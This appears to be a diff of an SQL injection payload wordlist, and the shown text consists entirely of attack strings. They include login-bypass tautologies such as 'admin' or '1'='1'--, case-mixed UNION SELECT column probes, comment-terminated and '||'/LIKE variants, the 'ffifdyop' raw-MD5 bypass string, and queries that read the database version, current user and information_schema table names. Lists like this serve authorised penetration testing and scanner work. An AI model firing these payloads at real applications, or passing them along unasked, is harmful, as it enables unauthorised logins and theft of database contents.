'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
